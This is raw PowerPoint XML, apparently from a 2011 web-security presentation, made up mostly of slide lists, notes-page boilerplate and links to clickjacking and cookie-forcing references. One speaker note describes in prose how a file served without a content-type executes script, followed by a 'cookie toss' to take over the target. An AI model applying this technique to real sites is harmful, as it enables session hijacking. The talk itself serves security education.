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36" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId115"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="745" r:id="rId5"/>
    <p:sldId id="308" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="291" r:id="rId8"/>
    <p:sldId id="442" r:id="rId9"/>
    <p:sldId id="324" r:id="rId10"/>
    <p:sldId id="336" r:id="rId11"/>
    <p:sldId id="342" r:id="rId12"/>
    <p:sldId id="328" r:id="rId13"/>
    <p:sldId id="744" r:id="rId14"/>
    <p:sldId id="334" r:id="rId15"/>
    <p:sldId id="441" r:id="rId16"/>
    <p:sldId id="325" r:id="rId17"/>
    <p:sldId id="326" r:id="rId18"/>
    <p:sldId id="743" r:id="rId19"/>
    <p:sldId id="259" r:id="rId20"/>
    <p:sldId id="331" r:id="rId21"/>
    <p:sldId id="332" r:id="rId22"/>
    <p:sldId id="337" r:id="rId23"/>
    <p:sldId id="338" r:id="rId24"/>
    <p:sldId id="339" r:id="rId25"/>
    <p:sldId id="343" r:id="rId26"/>
    <p:sldId id="344" r:id="rId27"/>
    <p:sldId id="346" r:id="rId28"/>
    <p:sldId id="741" r:id="rId29"/>
    <p:sldId id="368" r:id="rId30"/>
    <p:sldId id="345" r:id="rId31"/>
    <p:sldId id="348" r:id="rId32"/>
    <p:sldId id="351" r:id="rId33"/>
    <p:sldId id="349" r:id="rId34"/>
    <p:sldId id="350" r:id="rId35"/>
    <p:sldId id="352" r:id="rId36"/>
    <p:sldId id="369" r:id="rId37"/>
    <p:sldId id="371" r:id="rId38"/>
    <p:sldId id="736" r:id="rId39"/>
    <p:sldId id="373" r:id="rId40"/>
    <p:sldId id="737" r:id="rId41"/>
    <p:sldId id="742" r:id="rId42"/>
    <p:sldId id="358" r:id="rId43"/>
    <p:sldId id="359" r:id="rId44"/>
    <p:sldId id="360" r:id="rId45"/>
    <p:sldId id="367" r:id="rId46"/>
    <p:sldId id="362" r:id="rId47"/>
    <p:sldId id="262" r:id="rId48"/>
    <p:sldId id="307" r:id="rId49"/>
    <p:sldId id="628" r:id="rId50"/>
    <p:sldId id="629" r:id="rId51"/>
    <p:sldId id="630" r:id="rId52"/>
    <p:sldId id="631" r:id="rId53"/>
    <p:sldId id="632" r:id="rId54"/>
    <p:sldId id="633" r:id="rId55"/>
    <p:sldId id="634" r:id="rId56"/>
    <p:sldId id="635" r:id="rId57"/>
    <p:sldId id="636" r:id="rId58"/>
    <p:sldId id="637" r:id="rId59"/>
    <p:sldId id="747" r:id="rId60"/>
    <p:sldId id="639" r:id="rId61"/>
    <p:sldId id="640" r:id="rId62"/>
    <p:sldId id="641" r:id="rId63"/>
    <p:sldId id="642" r:id="rId64"/>
    <p:sldId id="643" r:id="rId65"/>
    <p:sldId id="644" r:id="rId66"/>
    <p:sldId id="645" r:id="rId67"/>
    <p:sldId id="646" r:id="rId68"/>
    <p:sldId id="647" r:id="rId69"/>
    <p:sldId id="648" r:id="rId70"/>
    <p:sldId id="649" r:id="rId71"/>
    <p:sldId id="650" r:id="rId72"/>
    <p:sldId id="651" r:id="rId73"/>
    <p:sldId id="652" r:id="rId74"/>
    <p:sldId id="653" r:id="rId75"/>
    <p:sldId id="654" r:id="rId76"/>
    <p:sldId id="655" r:id="rId77"/>
    <p:sldId id="656" r:id="rId78"/>
    <p:sldId id="658" r:id="rId79"/>
    <p:sldId id="659" r:id="rId80"/>
    <p:sldId id="660" r:id="rId81"/>
    <p:sldId id="667" r:id="rId82"/>
    <p:sldId id="657" r:id="rId83"/>
    <p:sldId id="703" r:id="rId84"/>
    <p:sldId id="704" r:id="rId85"/>
    <p:sldId id="705" r:id="rId86"/>
    <p:sldId id="706" r:id="rId87"/>
    <p:sldId id="707" r:id="rId88"/>
    <p:sldId id="708" r:id="rId89"/>
    <p:sldId id="709" r:id="rId90"/>
    <p:sldId id="710" r:id="rId91"/>
    <p:sldId id="711" r:id="rId92"/>
    <p:sldId id="712" r:id="rId93"/>
    <p:sldId id="713" r:id="rId94"/>
    <p:sldId id="714" r:id="rId95"/>
    <p:sldId id="715" r:id="rId96"/>
    <p:sldId id="716" r:id="rId97"/>
    <p:sldId id="717" r:id="rId98"/>
    <p:sldId id="718" r:id="rId99"/>
    <p:sldId id="719" r:id="rId100"/>
    <p:sldId id="720" r:id="rId101"/>
    <p:sldId id="721" r:id="rId102"/>
    <p:sldId id="722" r:id="rId103"/>
    <p:sldId id="748" r:id="rId104"/>
    <p:sldId id="724" r:id="rId105"/>
    <p:sldId id="740" r:id="rId106"/>
    <p:sldId id="738" r:id="rId107"/>
    <p:sldId id="739" r:id="rId108"/>
    <p:sldId id="726" r:id="rId109"/>
    <p:sldId id="727" r:id="rId110"/>
    <p:sldId id="728" r:id="rId111"/>
    <p:sldId id="731" r:id="rId112"/>
    <p:sldId id="730" r:id="rId113"/>
    <p:sldId id="746"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6" autoAdjust="0"/>
    <p:restoredTop sz="89141" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="-1860" y="-558"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="53" y="2101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447C8-8D91-4121-BAF9-82F75B7E4192}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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CD270F-A9BC-448A-B6ED-70FFB3CA4EDA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="86000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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3680798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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1839352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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1750042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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3009525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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877560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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3408034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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156593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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1813076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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626166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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3352186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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5089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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1043583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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2487812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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2770541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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2770541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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2631866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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2770541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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="841736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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1464182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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="581341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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1059380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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="803736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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218509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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2378661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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3565429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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3680391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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1832216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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1865418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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4203625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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="750589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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2481673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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2481673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87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64099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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2900249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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="800985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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2487757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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2487757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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182762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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="775600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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="981654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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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try to browse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to the XSL file that we disguised as a .jpg file, nothing happens because the content-type is set.  IE knows not to try to execute it as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>However, if we try browsing to the WXR file (that has been renamed by the service to a.txt file), content-type is NOT set, and we get script execution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>From there, we just cookie toss, and we win.</a:t>
            </a:r>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099870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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61365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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61365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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61365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EB84A-3697-47DF-BEA3-BDE2BC545CC5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284779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900249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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111194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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104272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D270F-A9BC-448A-B6ED-70FFB3CA4EDA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213225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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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1138841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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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15607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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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3311137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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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5296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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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67677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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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483618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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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81650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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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1382808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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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105118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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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391764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C7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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4466F-87FA-45B7-A18C-66BB54513628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338378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7A63E-3FC2-42BD-BA8B-89D7328E9E36}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/27/2011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4466F-87FA-45B7-A18C-66BB54513628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37388763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62.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide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mailto:jesseou@microsoft.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:richard.lundeen@gmail.com" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:travisr@microsoft.com"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owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/browsersec/wiki/Part2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/533texsx(VS.71).aspx" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 